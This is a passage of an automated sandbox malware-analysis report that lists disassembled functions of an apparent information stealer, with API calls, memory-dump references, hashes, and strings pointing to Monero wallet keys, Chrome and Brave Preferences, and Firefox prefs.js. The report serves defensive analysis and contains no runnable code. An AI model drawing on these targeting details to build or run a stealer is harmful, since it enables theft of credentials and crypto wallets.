                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: a1986d3e1d59222e8354595c035e8b0b7447145cde1c9ad9e8f92a27431143df
                                  • Instruction ID: 41cc1f9133db1365584e8e95368ecf5996fd22a87d1a63b7a799c0cc380b5b47
                                  • Opcode Fuzzy Hash: a1986d3e1d59222e8354595c035e8b0b7447145cde1c9ad9e8f92a27431143df
                                  • Instruction Fuzzy Hash: 56E012B5D5430163DA1477B0BC0AB2A3A9C6F15385F54443AFA1DD3502FA2DF841E66B

                                  Non-executed Functions

                                  Function 00F738B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00F738CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00F738E3
                                  • lstrcat.KERNEL32(?,?), ref: 00F73935
                                  • StrCmpCA.SHLWAPI(?,00F80F70), ref: 00F73947
                                  • StrCmpCA.SHLWAPI(?,00F80F74), ref: 00F7395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F73C67
                                  • FindClose.KERNEL32(000000FF), ref: 00F73C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: 67f1913246c91aaf5ed42e3d439ce01b427e518ae90e3226d7752ef040473b28
                                  • Instruction ID: a644587852b18a1b8ec35c1a1196501f314297ecc8faf1fa0c8c3a7f2d696626
                                  • Opcode Fuzzy Hash: 67f1913246c91aaf5ed42e3d439ce01b427e518ae90e3226d7752ef040473b28
                                  • Instruction Fuzzy Hash: C9A1A2B2900208ABDB34DFA4DC85FEE7778BF88300F448599A61D97145EB749B84DF62
                                  Function 00F6BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00F80B32,00F80B2B,00000000,?,?,?,00F813F4,00F80B2A), ref: 00F6BEF5
                                  • StrCmpCA.SHLWAPI(?,00F813F8), ref: 00F6BF4D
                                  • StrCmpCA.SHLWAPI(?,00F813FC), ref: 00F6BF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F6C7BF
                                  • FindClose.KERNEL32(000000FF), ref: 00F6C7D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  • Opcode ID: 875dc1eb398d6668bf6cd31a563536c76adecc9e3aaffa03954b5c2b044cbedf
                                  • Instruction ID: 3168005f912d5b290a028fb83a99321693a3c88cf6b1d1ab87491a44330489c8
                                  • Opcode Fuzzy Hash: 875dc1eb398d6668bf6cd31a563536c76adecc9e3aaffa03954b5c2b044cbedf
                                  • Instruction Fuzzy Hash: B14241729001089BDB18FB70DD96EEE737CAF94300F418569B51A97181EF389B49EB93
                                  Function 00F74910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00F7492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00F74943
                                  • StrCmpCA.SHLWAPI(?,00F80FDC), ref: 00F74971
                                  • StrCmpCA.SHLWAPI(?,00F80FE0), ref: 00F74987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F74B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00F74B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: 4d1ed636def556ee8c079b5367ead0a68003d9b129d9e0f98acf51c46094d406
                                  • Instruction ID: 08e42224dd57ea5b05f69a5a38786c4c693cedbcabaf5c4500365d2882159398
                                  • Opcode Fuzzy Hash: 4d1ed636def556ee8c079b5367ead0a68003d9b129d9e0f98acf51c46094d406
                                  • Instruction Fuzzy Hash: BB617472900218ABCB74EBA0EC45EEA777CBF88301F448599A61D97044EB35EB85DF91
                                  Function 00F74570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F74580
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F74587
                                  • wsprintfA.USER32 ref: 00F745A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00F745BD
                                  • StrCmpCA.SHLWAPI(?,00F80FC4), ref: 00F745EB
                                  • StrCmpCA.SHLWAPI(?,00F80FC8), ref: 00F74601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F7468B
                                  • FindClose.KERNEL32(000000FF), ref: 00F746A0
                                  • lstrcat.KERNEL32(?,016FE550), ref: 00F746C5
                                  • lstrcat.KERNEL32(?,016FD1B8), ref: 00F746D8
                                  • lstrlen.KERNEL32(?), ref: 00F746E5
                                  • lstrlen.KERNEL32(?), ref: 00F746F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: 519b29c866c69d627eec961128b8343dfaa47dbce3f3f71cc53c5953a849220f
                                  • Instruction ID: f8e79cbab3afb3bc1c4b5158041e205e5db4236c1abde9874ee9c6aaf49edb7e
                                  • Opcode Fuzzy Hash: 519b29c866c69d627eec961128b8343dfaa47dbce3f3f71cc53c5953a849220f
                                  • Instruction Fuzzy Hash: E45164719402189BC764EBB0DC89FEA777CAF58700F408599B61E92044EB749A85DF92
                                  Function 00F73EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00F73EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00F73EDA
                                  • StrCmpCA.SHLWAPI(?,00F80FAC), ref: 00F73F08
                                  • StrCmpCA.SHLWAPI(?,00F80FB0), ref: 00F73F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F7406C
                                  • FindClose.KERNEL32(000000FF), ref: 00F74081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 2b7a1fa909a5f53b01402200e49f433c78e3d04f4fe440fe036fa48dc11772ac
                                  • Instruction ID: f35390e718ea3fb68d4eb88335c83dd6368d7f4811678ac02f5b557f79bd9e54
                                  • Opcode Fuzzy Hash: 2b7a1fa909a5f53b01402200e49f433c78e3d04f4fe440fe036fa48dc11772ac
                                  • Instruction Fuzzy Hash: 925164B2900218ABCB68EBB0DC85EEA777CBF44700F408599B25D97044DB75EB89DF51
                                  Function 00F6ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00F6ED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00F6ED55
                                  • StrCmpCA.SHLWAPI(?,00F81538), ref: 00F6EDAB
                                  • StrCmpCA.SHLWAPI(?,00F8153C), ref: 00F6EDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F6F2AE
                                  • FindClose.KERNEL32(000000FF), ref: 00F6F2C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: 3117aaefe9f13e749a1901490f6993e7bd5c66b44b6107a370366b9fcd874493
                                  • Instruction ID: d92d0deb2f805c7a0c00b7db12c47478240567db01ac8fdd687cdf06998112fb
                                  • Opcode Fuzzy Hash: 3117aaefe9f13e749a1901490f6993e7bd5c66b44b6107a370366b9fcd874493
                                  • Instruction Fuzzy Hash: 42E1F6729111189AEB54FB60DC51EEE733CAF94300F4181AAB51E62092EF346F9ADF53
                                  Function 00F6F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F815B8,00F80D96), ref: 00F6F71E
                                  • StrCmpCA.SHLWAPI(?,00F815BC), ref: 00F6F76F
                                  • StrCmpCA.SHLWAPI(?,00F815C0), ref: 00F6F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F6FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 00F6FAC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: 91f0be6bef8cc10e2a5904726f9498138260918dc75a50e113bd18c7cdabe5bb
                                  • Instruction ID: a3f0d7c6e6f3ba596e0a30227922dac01af073e33e4971f88660bb1ba99f2917
                                  • Opcode Fuzzy Hash: 91f0be6bef8cc10e2a5904726f9498138260918dc75a50e113bd18c7cdabe5bb
                                  • Instruction Fuzzy Hash: 25B153719001089BDB28FF74DC56EEE7379AF94300F4181A9A41E97181EF346B4AEB93
                                  Function 0133BA04 Relevance: 15.4, Strings: 11, Instructions: 1622COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: )}w$.ew$.>H$1$?.$B#+7$J5hR$^"<?$dh|O$e;k$h/$!B?
                                  • API String ID: 0-964770783
                                  • Opcode ID: 51efc06258ac19eb311c4988fca72fb8c55af621e39ab9e8a0e3be5df83d82a0
                                  • Instruction ID: 3c51e1fd408d199a1b5e4c78c62f5530f9de13d918a1b368f672d916a5eb99d9
                                  • Opcode Fuzzy Hash: 51efc06258ac19eb311c4988fca72fb8c55af621e39ab9e8a0e3be5df83d82a0
                                  • Instruction Fuzzy Hash: C4B208F3A0C2009FE304AE2DDC8566AF7E5EF94720F1A893DEAC4C7744EA3558458697
                                  Function 00F616D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F8510C,?,?,?,00F851B4,?,?,00000000,?,00000000), ref: 00F61923
                                  • StrCmpCA.SHLWAPI(?,00F8525C), ref: 00F61973
                                  • StrCmpCA.SHLWAPI(?,00F85304), ref: 00F61989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F61D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00F61DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F61E20
                                  • FindClose.KERNEL32(000000FF), ref: 00F61E32
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
